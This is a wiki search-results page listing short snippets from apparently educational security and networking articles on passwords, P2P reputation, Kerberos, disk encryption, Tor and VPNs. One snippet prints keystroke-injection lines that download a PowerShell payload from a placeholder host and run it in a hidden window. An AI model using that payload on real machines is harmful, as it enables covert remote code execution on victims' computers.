Search results

Jump to navigation Jump to search

Page title matches

  • Finally the teaching of users to choose good passwords and giving negative feedback if not is essentially Instruct users to choose mnemonic passwords and use a password filter and request another
    2 KB (292 words) - 21:54, 8 November 2004

Page text matches

  • Will users compromise their passwords by using them on other systems?<br> There is a high probability and even if the users are given (unchangeable)
    640 bytes (100 words) - 22:02, 8 November 2004
  • -D "cn=Mathias Jeschke,cn=Users,dc=sar,dc=informatik,dc=hu-berlin,dc=de" \ -b "cn=Users,dc=sar,dc=informatik,dc=hu-berlin,dc=de" "(objectClass=person)"
    198 bytes (31 words) - 14:04, 12 November 2007
  • ...en 50% of the users were from the USA and 71% described themselves as home users. ...nt going on. Therefor right now it is hard to determine the real number of users and the real computating power of SETI@home.
    1 KB (156 words) - 14:43, 31 October 2005
  • ...ontents|Table of Contents]] | [[Passwords - Can Users be Trained|Next (Can Users Be Trained?)]]
    597 bytes (93 words) - 21:12, 8 November 2004
  • ...ion and Research Network). It consists of more than 1.4 million registered users (2004) and roughly 13TB of data are exchanged daily. Maze uses a simple point incentive system to prevent users from free-riding. Peers consume points by downloading and earn points by up
    1 KB (201 words) - 18:19, 26 July 2007
  • ...ey are probably not hardened to protect against malicious attacks by other users (take a look at the published vulnerabilities of Unix and Windows).
    452 bytes (66 words) - 21:05, 8 November 2004
  • Finally the teaching of users to choose good passwords and giving negative feedback if not is essentially Instruct users to choose mnemonic passwords and use a password filter and request another
    2 KB (292 words) - 21:54, 8 November 2004
  • [[Passwords - Can Users be Trained| 5.3 Can Users be Trained?]]<br>
    2 KB (229 words) - 20:52, 8 November 2004
  • 3. Will users remember the password or will they write it down because of complexity or w
    616 bytes (102 words) - 19:21, 8 November 2004
  • In a typical system, human users must authenticate themselves to
    779 bytes (109 words) - 19:09, 8 November 2004
  • ...ate the detection and discard of results of faulty processors or malicious users. A redundancy level of 2 or 3 is adequate for this. ...r work are never turned away. This increases the redundancy level the more users the project has and the higher the average speed per user gets. As the quan
    3 KB (547 words) - 14:42, 31 October 2005
  • -rw-r--r-- 1 wolfm users 7249 2005-12-01 12:47 deliver.exe -rwxr-xr-x 1 wolfm users 181 2005-12-01 13:35 filter.pl
    7 KB (1,117 words) - 10:06, 15 March 2007
  • ...upload costs, limited upload bandwidth, enviousness or egoism. Hence some users use P2P networks without sharing own resources (free-riding). ...as in e.g. the [[The Maze Peer-To-Peer System|Maze]]-network don't prevent users from cheating. Two kinds of user collusion are observed.
    4 KB (565 words) - 10:09, 30 July 2007
  • ...upload costs, limited upload bandwidth, enviousness or egoism. Hence some users use P2P networks without sharing own resources (free-riding). ...as in e.g. the [[The Maze Peer-To-Peer System|Maze]]-network don't prevent users from cheating. Two kinds of user collusion are observed.
    4 KB (567 words) - 16:31, 5 August 2007
  • ...the same system should be used to identify a user in a database of 10.000 users by simply trying the authentication on each database record in turn this wo ...n Rate (FRR) : This is the rate of authentication attempts from legitimate users that are rejected.
    6 KB (974 words) - 06:50, 23 February 2005
  • C:\Users\wolfm>openvpn --show-curves
    1 KB (177 words) - 12:27, 18 September 2018
  • ...en the table is filled up, no more connections can be allowed. Now regular users of the service won’t be able to access it. ...users, but can keep the system "alive" and thus accessible to most regular users.
    6 KB (946 words) - 19:29, 14 November 2004
  • *Allows shared access from multiple users.
    797 bytes (134 words) - 17:09, 19 November 2004
  • A community network must be usable for inexperienced end users; thus self-organization is essential. On the one hand, we are working on pr ...lenges is the insufficient scalability with increasing number of nodes and users. The most important reason for this phenomenon can be found in the structur
    3 KB (412 words) - 08:08, 18 November 2010
  • ...h sensible data. It must work ''today'' and not exclude any users. Instead users with unsafe browsers should be warned. * Client-side script to warn users with unsafe browsers
    4 KB (645 words) - 16:03, 28 September 2013
  • ...If the encryption key is broken or compromised then all anonymity for all users for all past transactions would be void. (Break one, break all.) It might b ...correctness of the system will be endangered and not the anonymity of its users.</dd>
    4 KB (699 words) - 01:57, 13 May 2006
  • ...and who operate and maintain those resources in order to offer services to users. To recover their investments (and to make some profit) they charge their c ...feasible to outsource the function of an operator (company) to the service users. The software that normally runs on operator-owned computers may be split i
    4 KB (597 words) - 12:28, 21 November 2006
  • ** attributes of system critical files (rights / users / size / modification date etc.) ** in our example: the treshold is computed from the users past login activities
    6 KB (934 words) - 04:13, 11 February 2005
  • A P2P network is usually open to everyone, so it is also open for malicious users who want to damage the network. They can do that depending on the architect ...network to keep going well it needs to protect itself somehow. Restricting users depending on their reputation is a way to do so.
    10 KB (1,629 words) - 11:50, 26 April 2006
  • ...User die Tickets/Anfragen los, sondern Programme (Clients) im Auftrag des Users. Da aber der User die Kommunikation veranlasst (und sei es, in dem er den C .... Das TGT besteht aus: TGT{Session-Key für SGS,Username,Rechneradresse des Users} und ist mit dem Passwort / geheimen Schlüssel des SGS verschlüsselt, das
    11 KB (1,656 words) - 10:06, 13 July 2005
  • ** to using the ignorance of users **** optimal: users do not install software
    6 KB (872 words) - 21:31, 28 January 2005
  • Users of a public key shall be confident that the associated private an SSL server at Bob’s site is also not practical for many users.
    10 KB (1,517 words) - 21:27, 15 February 2005
  • because in case of, e.g. a raid this would compromise the users' anonymity.
    2 KB (364 words) - 21:55, 31 October 2006
  • ...cuse me for using your time, but I have changed the security mode. Now all users have to be updated if they are to have access again. Would you please give
    2 KB (312 words) - 20:21, 14 November 2004
  • ...e that the position of the nodes is determined only by the fact, where its users happen to live. ...teways, which advertise themselves as such to the rest of the network. The users are free to transform their BSS into a gateway by making their internet acc
    9 KB (1,491 words) - 14:24, 18 July 2007
  • C:\Users\wolfm>openvpn --show-ciphers
    5 KB (717 words) - 12:14, 18 September 2018
  • The default responses are correct for most users.
    3 KB (377 words) - 21:32, 14 November 2006
  • * Acceptability of Reputation Information by end users ...reputation depends on who makes the query and how that person rated other users. User anonymity through pseudonyms are allowed in both systems.
    7 KB (1,070 words) - 10:52, 7 May 2006
  • -rw-r--r-- 1 mj users 111415 2006-05-13 14:33 fs/unionfs/unionfs.ko
    4 KB (574 words) - 11:00, 13 May 2006
  • For human users is a more simple representation than the reputation function needed.<br>
    5 KB (1,111 words) - 08:28, 28 February 2006
  • * To create the toolchain, you will need debootstrap for it. Debian users run:
    4 KB (541 words) - 19:21, 15 December 2005
  • ...l in systems that are confined to single locations and specified groups of users ...the authorization decision. In some cases remote users are mapped to local users. This approach does not allow for delegation and relies heavily on an exist
    20 KB (3,188 words) - 11:59, 4 January 2005
  • ...ased on HMAC-SHA-512, HMAC-RIPEMD-160, or HMAC-Whirlpool, depending on the users selection. ...ent of a mounted TrueCrypt volume is visible (accessible) to all logged on users (NTFS file permissions can be configured to prevent this).
    17 KB (2,810 words) - 16:55, 10 June 2008
  • ...cker provides AES key size of either 128 Bits or 256 bits depending on the users choosing.
    7 KB (1,241 words) - 16:03, 20 June 2008
  • ...n the middle''' attack. They use a HTTP protocol vulnerability to redirect users to their pages. Technically, they were never intended. There is no standard ...ot redirected to the portal, but instead they get an https error. Already, users often have the problem that many large websites such as Google, Facebook or
    15 KB (2,455 words) - 13:54, 12 October 2017
  • ...welchem Identity Provider Sie vertraut. Es erfolgt eine Weiterleitung des Users von der Relying Paty zum Identity Provider. ...Problem mit der Privatsphäre könnte entstehen wenn das Nutzverhalten eines Users durch den ID-Provider gespeichert wird oder Transaktionen nachverfolgt werd
    19 KB (2,676 words) - 14:28, 24 January 2013
  • But more emissions than most users are aware of, are the result of unintended side effects. E.g. anything that ...phone lines in homes for sending and receiving mail. During the tests some users complained about interference from their neighbor's units. Several persons
    15 KB (2,332 words) - 12:51, 3 February 2005
  • These Statements are solely concerned with the privacy of users and pose strong restrictions on communication. They usually result in eithe Each of these aspects can give away information about the users of the network. Freenet tries to provide all this functionality while maint
    20 KB (3,255 words) - 11:59, 14 October 2007
  • ...mit VoIP: Study of delay patterns of weighted voice traffic of end-to-end users on the VoIP network (2002) [http://portal.acm.org/citation.cfm?id=568414&co ...this paper we study delay patterns of weighted voice traffic of end-to-end users on the Voice over Internet Protocol (VoIP) network. We compare the delay pe
    17 KB (2,363 words) - 11:54, 12 July 2005
  • ..., angelegt werden. Außerdem muss ein Benutzer angelegt werden in der <code>users.conf</code> mit {username} und {password}. • <code>users</code> The traditional RADIUS configuration file for users. This file format is similar to the format
    27 KB (3,746 words) - 13:59, 8 November 2022
  • STRING $client.DownloadFile(„http://[HostIP]:[port x]/payload.ps1“, “C:\Users\$env:UserName\payload.ps1“) STRING powershell.exe -windowstyle hidden -File C:\Users\$env:UserName\payload.ps1
    30 KB (4,186 words) - 12:48, 17 October 2017
  • The performance of wireless ad-hoc networks degrades as the number of users increases. One major reason for that is the sharing of a single channel.
    14 KB (2,372 words) - 13:42, 23 July 2006
  • ...weakens forward security, since now <math>k_1</math> is static between two users and a breach of an identity key would be more severe. The protocol relied s
    13 KB (1,927 words) - 13:56, 24 October 2023
  • ...ding and installing prepackaged OpenWRT software from the Internet. Debian users familiar with the apt-get system will recognize the similarities.
    14 KB (2,383 words) - 01:42, 8 August 2005
  • ...gültig ist und demnach nach einer gewissen Zeit ein erneutes Einloggen des Users vorausgesetzt wird. Das Abschätzen der Lebensdauer eines Tickets ist schwi
    17 KB (2,561 words) - 10:45, 19 October 2006
  • This ''improvement'' has its downside: Users are going to reuse their main password for their WLAN device. This means th
    32 KB (5,152 words) - 16:11, 20 November 2018
  • Since there are significantly more users of Tor than ORs, every OR is part of multiple circuits. Because the OR need
    37 KB (5,617 words) - 08:11, 22 February 2006